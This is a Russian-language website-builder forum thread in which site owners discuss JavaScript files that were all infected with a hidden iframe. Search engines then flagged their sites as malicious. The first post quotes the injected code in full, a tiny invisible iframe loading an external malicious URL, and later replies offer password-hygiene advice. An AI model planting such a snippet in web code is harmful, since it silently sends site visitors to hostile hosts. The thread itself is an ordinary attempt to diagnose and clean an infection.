• Страница 1 из 1
  • 1
Модератор форума: Yuri_G  
Внезапно появился Iframe во всех js-файлах
serega1885
Сообщений: 47
Репутация: 9
Уровень замечаний:

Сообщение # 1 | 02:14:55
Сразу прошу прощения за создание отдельной темы. Модераторы, не переносите сразу, может у кого-то похожая проблема.

Сегодня гугл повесил предупреждение на сайт, сразу пошел искать вирусный код. С помощью одного полезного сайта, выяснил, что вирус кроется в моих js-файлах. Сайт довольно старый, поэтому этих файлов там накопилось штук 30 - некоторые в папках третьего уровня, которые я сам-то не сразу нашел.

Но во всех этих скриптах была такая приписка:
Code
/*d1752c*/    
    (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();    
    /*/d1752c*/

Которая перекидывала пользователей на сайт с виагрой.
Повторюсь - во всех, без исключения файлах, был вредоносный код. То есть, его прописывали не вручную, а с помощью какой-то программы. И срабатывал он не всегда, а лишь в 5% случаев.
Разумеется, у меня возник вопрос - каким боком вирус попал в скрипты? Меня взломали? Или это новая уязвимость в безопасности?

Может у кого-то есть похожая проблема, поиск по гуглу вывел множество сайтов с похожим кодом, и на каждом висит предупреждение: "Этот сайт содержит вредоносный код".

Еще раз извиняюсь за отдельную тему, просто интересно общественное мнение, по этому вопросу.
P.S Все пароли поменял, думаю сменить почту на всякий случай.
Сообщение отредактировал serega1885 - Воскресенье, 04 Ноя 2012, 02:24:29
Dolor
Сообщений: 172
Репутация: 160

Сообщение # 2 | 02:41:15
serega1885,
Quote (serega1885)
Меня взломали?
Посмотрите Лог действий в ПУ.
serega1885
Сообщений: 47
Репутация: 9
Уровень замечаний:

Сообщение # 3 | 02:49:27
Quote (Dolor)
Посмотрите Лог действий в ПУ.

Посмотрел логи за последний месяц, все действия с моего IP, под моим логином. То есть, черз админку эти вирусы никто не прописывал. Тогда как они появились?

Забыл сказать, что у меня имеется антивирус - лицензия Касперского, сроком на 1 год. Регулярно провожу проверку и обновления.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 4 | 14:39:39
serega1885,
Quote
каким боком вирус попал в скрипты? Меня взломали? Или это новая уязвимость в безопасности?
возможна утечка пароля. чаще всего это делается через админ бар с доступом к фм. но вы могли и сами залить зараженные файлы, а активироваться они могли только сейчас
если у вас на сайте есть ещё администраторы, модераторы и остальные с доступом к админ бару и фм, то берите интервью у них или ищите утечку там.
не давайте никому доступ к фм и сделайте жесткий пароль на фтп (его можно не запоминать), просто перед каждым использованием ставить длинную и страшную комбинацию циферь и буков

смените пароли везде и если есть отберите доступ у всех

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
serega1885
Сообщений: 47
Репутация: 9
Уровень замечаний:

Сообщение # 5 | 15:20:11
Здравствуйте, Webanet. В том то и дело, что доступ к админ-панели только у меня. И даже если злоумышленник получил его, то зачем ему менять все ява-скрипты. Их найти-то очень сложно на сайте, некоторые содержаться среди десятков картинок, в папках третьего уровня вложенности. Ну, и Лог безопасности говорит о том, что в админку никто не заходил.

Также, я отметаю вариант с ФТП-доступом, т.к. зараженные файлы сохранили оригинальную дату загрузки (если бы их подменили, то была бы новая дата).

Загрузить вредоносные файлы я не мог, т.к. составлял некоторые js самостоятельно, и точно уверен, что iframe там не было.

Опираясь на все эти доводы, я склонен считать, что хакер каким-то образом нашел возможность редактировать файлы, без права доступа. Проще говоря - уязвимость. Хотя, я могу и ошибаться.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 6 | 15:24:42
serega1885,
Quote
т.к. зараженные файлы сохранили оригинальную дату загрузки (если бы их подменили, то была бы новая дата).
я это не понимаю. дата заливки скриптов вами? или что?

Quote
Опираясь на все эти доводы, я склонен считать, что хакер каким-то образом нашел возможность редактировать файлы, без права доступа. Проще говоря - уязвимость. Хотя, я могу и ошибаться.
думаю ошибаетесь. займитесь сменой паролей.
об остальном без образцов скриптов и адреса сайта говорить сложно

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 7 | 15:56:06
serega1885,
Quote
зараженные файлы сохранили оригинальную дату загрузки (если бы их подменили, то была бы новая дата).
"Врезка вредоносного участка" в загруженный скрипт - как редактирование скрипта не изменяет его дату-время

gserg
Сообщений: 4
Репутация: 0

Сообщение # 8 | 16:00:13
Аналогичная проблема, и мой сайт заблокировали sad
Вансан
Сообщений: 77
Репутация: 33

Сообщение # 9 | 13:46:01
Цитата (serega1885)
И даже если злоумышленник получил его, то зачем ему менять все ява-скрипты. Их найти-то очень сложно на сайте, некоторые содержаться среди десятков картинок, в папках третьего уровня вложенности.
Это делалось с помощью программы - тут ничего сложного нет.
Дописать во все файлы по маске *.js вредоносный префикс и всё.

Absit invidia verbo
Airy
Сообщений: 18
Репутация: 3

Сообщение # 10 | 23:02:23
Ребята...! Помогите..!!! пожалуйста..! обнаружить скрипт, который вредоносные коды в джава файлы подружает
Яндекс пометил мой сайт как вредоносный и угрожающий для посетителей... http://d-stud.ru/ help
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 11 | 23:19:11
Airy, вы уже очищали сайт? смените фтп пароль. поставьте сложный и смените uid пароль

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Вансан
Сообщений: 77
Репутация: 33

Сообщение # 12 | 23:21:55
Airy, если не очищали, выявить на какой именно странице Яндекс заметил скрипт с Iframe можно через Я.Вебмастер.

Absit invidia verbo
Airy
Сообщений: 18
Репутация: 3

Сообщение # 13 | 23:53:11
webanet, да, коды поразному удаляли... с джава файлов, но они заново появляются.. попробую поменять пароль опять...
Вансан, яндекс вебмастер раздел безопасности пишет:
19.05.2013 http://d-stud.ru/index....stud.ru Mal/Iframe-AO
27.05.2013 http://d-stud.ru/index....stud.ru Mal/Iframe-AO
27.05.2013 http://d-stud.ru/index....stud.ru Mal/Iframe-AO
27.05.2013 http://d-stud.ru/index....remont1 Поведенческий анализ
27.05.2013 http://d-stud.ru/index....stud.ru Mal/Iframe-AO
указывает на одну и ту же страницу, но что там не так - я не понимаю...
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 14 | 00:00:11
Airy, сейчас все чисто. меняйте пароли

на указанных страницах пример http://d-stud.ru/index/remont_pod_kluch/0-115 сейчас только ошибки кода. на всех по две головы.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
  • Страница 1 из 1
  • 1
Поиск: